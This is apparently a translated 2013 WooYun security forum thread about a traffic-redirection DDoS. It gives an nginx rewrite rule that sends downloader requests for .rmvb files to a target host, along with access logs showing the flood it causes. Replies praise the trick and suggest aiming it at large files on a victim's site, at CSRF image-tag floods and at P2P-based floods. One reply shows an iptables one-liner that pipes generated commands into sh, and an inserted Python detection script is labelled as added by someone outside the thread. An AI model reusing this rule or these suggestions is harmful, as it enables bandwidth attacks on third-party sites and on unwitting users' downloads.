116.11.198.33 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
116.11.198.33 - - [24/May/2013:22:06:26 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
1.194.117.98 - - [24/May/2013:22:06:26 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
116.11.198.33 - - [24/May/2013:22:06:26 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
116.11.198.33 - - [24/May/2013:22:06:27 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
117.88.225.78 - - [24/May/2013:22:06:27 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; KB974488)"
218.89.59.42 - - [24/May/2013:22:06:27 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; BOIE9;ZHCN)"
116.11.198.33 - - [24/May/2013:22:06:27 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
111.172.197.39 - - [24/May/2013:22:06:28 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
183.9.16.122 - - [24/May/2013:22:06:28 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; BRI/2)"
58.19.214.162 - - [24/May/2013:22:06:29 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
182.149.204.207 - - [24/May/2013:22:06:29 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
120.36.248.212 - - [24/May/2013:22:06:30 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C)"
101.85.201.140 - - [24/May/2013:22:06:30 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
183.64.202.70 - - [24/May/2013:22:06:31 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
113.116.100.130 - - [24/May/2013:22:06:31 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; BTRS124342; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
27.155.191.254 - - [24/May/2013:22:06:31 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"
183.157.115.3 - - [24/May/2013:22:06:32 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
182.149.204.207 - - [24/May/2013:22:06:33 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
218.5.58.196 - - [24/May/2013:22:06:34 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
49.84.154.38 - - [24/May/2013:22:06:34 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
183.64.202.70 - - [24/May/2013:22:06:34 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
49.65.10.145 - - [24/May/2013:22:06:35 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MASM; Media Center PC 6.0; Tablet PC 2.0; .NET4.0C; BRI/2)"
183.156.53.206 - - [24/May/2013:22:06:35 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
219.159.107.138 - - [24/May/2013:22:06:36 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
222.240.152.232 - - [24/May/2013:22:06:36 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
183.64.202.70 - - [24/May/2013:22:06:36 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
183.64.202.70 - - [24/May/2013:22:06:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
182.149.204.207 - - [24/May/2013:22:06:37 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
183.64.202.70 - - [24/May/2013:22:06:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
180.159.38.52 - - [24/May/2013:22:06:38 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
113.121.71.143 - - [24/May/2013:22:06:38 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
101.85.201.140 - - [24/May/2013:22:06:39 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
1.48.225.6 - - [24/May/2013:22:06:39 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; MDDC)"
183.64.202.70 - - [24/May/2013:22:06:40 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
183.64.202.70 - - [24/May/2013:22:06:41 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
116.17.198.91 - - [24/May/2013:22:06:41 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
183.157.115.3 - - [24/May/2013:22:06:41 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
183.158.111.62 - - [24/May/2013:22:06:42 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; KB974488)"
112.102.189.170 - - [24/May/2013:22:06:42 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
58.19.214.162 - - [24/May/2013:22:06:43 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
180.136.11.157 - - [24/May/2013:22:06:43 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; KB974489)"
111.172.197.39 - - [24/May/2013:22:06:44 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
115.227.237.29 - - [24/May/2013:22:06:45 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
115.227.237.29 - - [24/May/2013:22:06:46 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
115.227.237.29 - - [24/May/2013:22:06:46 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
111.172.197.39 - - [24/May/2013:22:06:46 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
183.156.53.206 - - [24/May/2013:22:06:47 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
115.227.237.29 - - [24/May/2013:22:06:47 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
115.227.237.29 - - [24/May/2013:22:06:47 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
115.227.237.29 - - [24/May/2013:22:06:48 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
115.227.237.29 - - [24/May/2013:22:06:48 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.185.214.234 - - [24/May/2013:22:06:49 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
49.84.154.38 - - [24/May/2013:22:06:49 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
113.69.224.119 - - [24/May/2013:22:06:50 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
125.107.7.208 - - [24/May/2013:22:06:51 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
111.172.197.39 - - [24/May/2013:22:06:52 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
112.66.164.218 - - [24/May/2013:22:06:53 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
125.121.189.58 - - [24/May/2013:22:06:55 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"
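8#
imlonghao (imlonghao.com link exchange) | 2013-05-24 22:10
The rule at this point is as follows.
```nginx
# Every request whose URI ends in .rmvb gets a redirect to the test host.
location ~* \.(rmvb)$ {
    rewrite ^/ http://test.wooyun.imlonghao.com/?xl;
}
```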
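9#
/fd (/proc) ?() | 2013-05-24 22:10
Badass.
10#
xsser (Ten phalluses differ in length!!) | 2013-05-24 22:14
Damn... that's quite a lot of volume.
11#
leaf | 2013-05-24 22:20
Good idea!
12#
docall (I am Young Master Chen...) | 2013-05-24 22:22
going down! Jianxin, hurry up and get Whisper (护舒宝) to sponsor you!
13#
斯文的鸡蛋 (With pics there's jb... but having jb doesn't necessarily mean there's truth) | 2013-05-24 22:33
That's damn dirty.
14#
L.N. (Zhang Fei + Cao Cao) | 2013-05-24 22:52
Truly dirty.
15#
Mujj (Looking for someone who pentests websites to teach me pentesting; I'll give them an 8-digit QQ number and a couple's number) | 2013-05-24 23:02
```sh
# '符合规则的' ("matching the rule") is a placeholder for the pattern that selects the unwanted requests.
cat wooyun.org.log | grep '符合规则的' | awk '{print "iptables -I INPUT -p tcp --dport 80 -s ", $1, "-j DROP"}' | sort -n | uniq | sh
```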
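An added example (not written by any poster in this thread): seen from the server that receives the redirected requests, it parses nginx combined-format lines, flags a URI that many distinct clients request with mostly 206/416 responses, and builds block rules in the `iptables` form of the one-liner above as reviewable argument lists instead of piping log text to `sh`. The sample lines, the addresses, `redirector.example` and the thresholds are constructed assumptions.

```python
import ipaddress
import re
from collections import Counter, defaultdict

# nginx "combined" format: addr - user [time] "request" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?:\d+|-) "(?P<referer>[^"]*)" "[^"]*"$')
# Statuses returned to clients that send Range headers (segmented downloaders).
RANGE_STATUSES = {"206", "416"}

# Constructed sample lines using documentation addresses (not taken from the thread).
SAMPLE_LOG = '''\
192.0.2.10 - - [24/May/2013:22:06:56 +0800] "GET /?xl HTTP/1.1" 416 608 "http://redirector.example" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.0.2.11 - - [24/May/2013:22:06:56 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
192.0.2.11 - - [24/May/2013:22:06:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
198.51.100.7 - - [24/May/2013:22:06:59 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://redirector.example" "Mozilla/4.0 (compatible; MSIE 7.0)"
198.51.100.7 - - [24/May/2013:22:07:00 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"
203.0.113.5 - - [24/May/2013:22:07:01 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://redirector.example" "Mozilla/4.0 (compatible; MSIE 7.0)"
203.0.113.9 - - [24/May/2013:22:07:02 +0800] "GET /about HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
this line is not in combined format
'''


def parse(text):
    """Return one dict per well-formed line whose first field is a real IP address."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        try:
            ipaddress.ip_address(m["ip"])  # only real addresses may reach a firewall rule
        except ValueError:
            continue
        records.append(m.groupdict())
    return records


def find_range_floods(records, min_clients=3, min_range_ratio=0.8):
    """Flag URIs hit by many distinct clients where most replies are 206/416."""
    per_uri = defaultdict(lambda: {"hits": 0, "range_hits": 0,
                                   "clients": set(), "referers": Counter()})
    for r in records:
        s = per_uri[r["uri"]]
        s["hits"] += 1
        s["range_hits"] += r["status"] in RANGE_STATUSES
        s["clients"].add(r["ip"])
        if r["referer"] != "-":
            s["referers"][r["referer"]] += 1
    flagged = {}
    for uri, s in per_uri.items():
        ratio = s["range_hits"] / s["hits"]
        if len(s["clients"]) >= min_clients and ratio >= min_range_ratio:
            top = s["referers"].most_common(1)
            flagged[uri] = {"hits": s["hits"], "clients": len(s["clients"]),
                            "range_ratio": round(ratio, 2),
                            "top_referer": top[0][0] if top else None}
    return flagged


def block_candidates(records, uri, min_hits=2):
    """Addresses with at least min_hits 206/416 responses on uri, sorted numerically."""
    hits = Counter(r["ip"] for r in records
                   if r["uri"] == uri and r["status"] in RANGE_STATUSES)
    keep = [ipaddress.ip_address(ip) for ip, n in hits.items() if n >= min_hits]
    return [str(a) for a in sorted(keep, key=lambda a: (a.version, int(a)))]


def iptables_argv(addr):
    """Argument list for the rule form used in the thread; review before running."""
    return ["iptables", "-I", "INPUT", "-p", "tcp", "--dport", "80",
            "-s", addr, "-j", "DROP"]
```

The most frequent non-empty referer of a flagged URI points at the page that is sending clients over, which is often more useful to act on than the individual client addresses.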
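16#
x0ers (What exactly did the first person to find out milk was drinkable do to the cow?) | 2013-05-24 23:02
Nice idea. Bump.
17#
LittlePig (</html>) | 2013-05-25 00:13
This can be filed under sneaky tricks...
18#
livers (Like a dream, like an illusion) | 2013-05-25 11:41
@imlonghao You're taking 800 damage yourself.
19#
虚云 | 2013-05-25 12:09
Can you afford the rewrite? If you want to kill someone else, you first need plenty of HP yourself.
@livers
Spot on!
20#
虚云 | 2013-05-25 12:10
Still, the idea does deserve praise. If someone put a popular blockbuster on some hosting space that allows uploads and publishes the link, the consequences would be unthinkable.
21#
z7y (I am z7y, and I speak for Little Fatty!!) | 2013-05-25 12:31
Super cool.... File it under sneaky tricks~ @xsser
22#
insight-labs (Root Yourself in Success) | 2013-05-25 12:42
@虚云 If you can find a resource- or bandwidth-hungry link on the other party's site, such as a large file, rewriting to it costs very little.
23#
imlonghao (imlonghao.com link exchange) | 2013-05-25 13:00
@虚云 @livers
From what I've observed, if it's only a rewrite, it doesn't hurt me much...
As @insight-labs said, if the other side has a very large file, you can simply rewrite to it.
Note that the request being sent will actually go and download it..
24#
核攻击 (Rule the globe, enslave all of humanity! Destroy any organic life form that dares stand in the way!) | 2013-05-25 14:36
Speaking of traffic-forwarding attacks, there is actually something simpler and more efficient: just go to the high-traffic threads on Baidu Tieba:
See: [CSRF] Image-based (<img) DDoS, CC, session hijacking and probing of user information, you know what I mean...
25#
萧然 (I like all beautiful things·) | 2013-05-25 14:41
@核攻击 Wow, that works too? I once used this kind of thing to inflate a China Mobile promotion, took first place and won a phone.
26#
imlonghao (imlonghao.com link exchange) | 2013-05-25 14:48
@核攻击 If it were D8, if it could take over the front page....
27#
核攻击 (Rule the globe, enslave all of humanity! Destroy any organic life form that dares stand in the way!) | 2013-05-25 14:49
Speaking of attacks that use cloud resources, some years ago someone posed as a popular P2P resource to launch a massive pure-bandwidth attack...
28#
imlonghao (imlonghao.com link exchange) | 2013-05-25 14:57
@核攻击 Do you have a link I could look at?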
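29#
核攻击 (Rule the globe, enslave all of humanity! Destroy any organic life form that dares stand in the way!) | 2013-05-25 15:07
@imlonghao Using P2P networks to launch large-scale, high-volume DDoS attacks
30#
核攻击 (Rule the globe, enslave all of humanity! Destroy any organic life form that dares stand in the way!) | 2013-05-25 15:18
@萧然 See: [CSRF] Image-based (<img) DDoS, CC, session hijacking and probing of user information
31#
CHForce (Trojan handler) | 2013-05-25 15:58
Each reply is more impressive than the last, and the tricks keep getting sharper.
32#
happytree ("If I die, please eat me") | 2013-05-25 16:02
Yamete~ that's too scary.
33#
廷廷 (Ideas matter most) | 2013-05-25 16:16
@核攻击 Definitely going to study this!!!
34#
小森森 | 2013-05-25 17:44
Thumbs up~~ But... your own site will get really laggy too~
35#
imlonghao (imlonghao.com link exchange) | 2013-05-25 18:08
@小森森 http://imlonghao.com is still in this situation right now, but does it feel laggy to you?
36#
Mujj (Looking for someone who pentests websites to teach me pentesting; I'll give them an 8-digit QQ number and a couple's number) | 2013-05-25 18:52
@imlonghao Rewriting consumes CPU resources, but it doesn't use up much.
37#
whking | 2013-05-25 19:56
@imlonghao Your site went down a few days ago; I thought you had shut it down.
38#
imlonghao (imlonghao.com link exchange) | 2013-05-25 20:32
@whking -.-##
39#
GaRY | 2013-05-26 00:45
Great post! Absolutely a highlight. It's not that nobody has thought about DDoS techniques along these lines, but none of them reached the stage of a concrete instance. The OP's post is the first one, AFAIK.
40#
xsser (Ten phalluses differ in length!!) | 2013-05-26 11:32
@livers For the OP himself, this should only cost the rewrite, but for the target it may also have to go through the database......
41#
小森森 | 2013-05-26 14:56
@imlonghao It's not laggy.. but I can't get onto it...
42#
蟋蟀哥哥 (popok is a grandson!! [just for fun]) | 2013-05-26 15:51
This is a featured post now.
hang | 2013-05-26 20:34
This reminded me of vessial's talk slides at POC2011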
[Xunlei\_Network\_Internal\_for\_PoC2011.pdf](https://pan.baidu.com/share/link?shareid=446419uk=771752861)